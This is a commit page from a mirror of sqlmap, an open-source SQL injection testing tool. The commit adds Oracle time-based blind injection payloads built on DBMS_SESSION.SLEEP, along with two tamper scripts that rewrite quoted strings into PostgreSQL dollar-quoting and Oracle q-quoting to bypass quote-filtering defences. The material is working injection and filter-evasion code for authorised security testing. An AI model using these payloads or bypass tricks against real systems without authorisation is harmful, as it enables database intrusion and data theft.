mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-07-12 03:23:27 +00:00
Minor update for Oracle support
This commit is contained in:
parent
b8fb645db0
commit
827ec0a06c
4 changed files with 137 additions and 1 deletions
|
|
@ -1776,6 +1776,26 @@
|
|||
</test>
|
||||
|
||||
<!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
|
||||
<!-- DBMS_SESSION.SLEEP is granted to PUBLIC on Oracle 18c+ (unlike DBMS_LOCK.SLEEP, which needs an explicit grant); tried first so modern targets get a no-privilege delay, falling back to DBMS_LOCK.SLEEP on older releases -->
|
||||
<test>
|
||||
<title>Oracle time-based blind - Parameter replace (DBMS_SESSION.SLEEP)</title>
|
||||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;</vector>
|
||||
<request>
|
||||
<payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
|
||||
<stype>5</stype>
|
||||
|
|
@ -2072,6 +2092,25 @@
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_SESSION.SLEEP)</title>
|
||||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;)</vector>
|
||||
<request>
|
||||
<payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
|
||||
<stype>5</stype>
|
||||
|
|
|
|||
|
|
@ -20,7 +20,7 @@ from lib.core.enums import OS
|
|||
from thirdparty import six
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.10.7.70"
|
||||
VERSION = "1.10.7.71"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
|
|
|
|||
44
tamper/dollarquote.py
Normal file
44
tamper/dollarquote.py
Normal file
|
|
@ -0,0 +1,44 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
import os
|
||||
import re
|
||||
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import PRIORITY
|
||||
|
||||
__priority__ = PRIORITY.LOW
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Replaces single-quoted strings with PostgreSQL dollar-quoted strings (e.g. 'abc' -> $$abc$$)
|
||||
|
||||
Requirement:
|
||||
* PostgreSQL
|
||||
|
||||
Tested against:
|
||||
* PostgreSQL 9.x, 10-16
|
||||
|
||||
Notes:
|
||||
* Useful to bypass filters that block, strip or escape the single-quote
|
||||
character: dollar-quoting is quote-free and needs no escaping
|
||||
* A literal already containing '$$' is left untouched
|
||||
|
||||
>>> tamper("SELECT 'abc' FROM t WHERE x='def'")
|
||||
'SELECT $$abc$$ FROM t WHERE x=$$def$$'
|
||||
"""
|
||||
|
||||
retVal = payload
|
||||
|
||||
if payload:
|
||||
retVal = re.sub(r"'([^']*)'", lambda match: "$$%s$$" % match.group(1) if "$$" not in match.group(1) else match.group(0), payload)
|
||||
|
||||
return retVal
|
||||
53
tamper/oraclequote.py
Normal file
53
tamper/oraclequote.py
Normal file
|
|
@ -0,0 +1,53 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
import os
|
||||
import re
|
||||
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import PRIORITY
|
||||
|
||||
__priority__ = PRIORITY.LOW
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ORACLE))
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Replaces single-quoted strings with Oracle alternative-quoted strings (e.g. 'abc' -> q'[abc]')
|
||||
|
||||
Requirement:
|
||||
* Oracle 10g+
|
||||
|
||||
Tested against:
|
||||
* Oracle 11g, 12c, 18c, 19c, 21c, 23ai
|
||||
|
||||
Notes:
|
||||
* Useful to bypass filters that block, strip or escape the single-quote
|
||||
character: q-quoting delimits the literal with a chosen bracket/char
|
||||
so the inner text needs no quote at all
|
||||
* The first delimiter whose characters are absent from the literal is
|
||||
used; a literal that contains every candidate delimiter is left untouched
|
||||
|
||||
>>> tamper("SELECT 'abc' FROM DUAL")
|
||||
"SELECT q'[abc]' FROM DUAL"
|
||||
"""
|
||||
|
||||
def _quote(match):
|
||||
value = match.group(1)
|
||||
for start, end in (("[", "]"), ("{", "}"), ("(", ")"), ("<", ">"), ("!", "!"), ("|", "|"), ("#", "#")):
|
||||
if start not in value and end not in value:
|
||||
return "q'%s%s%s'" % (start, value, end)
|
||||
return match.group(0)
|
||||
|
||||
retVal = payload
|
||||
|
||||
if payload:
|
||||
retVal = re.sub(r"'([^']*)'", _quote, payload)
|
||||
|
||||
return retVal
|
||||
Loading…
Add table
Add a link
Reference in a new issue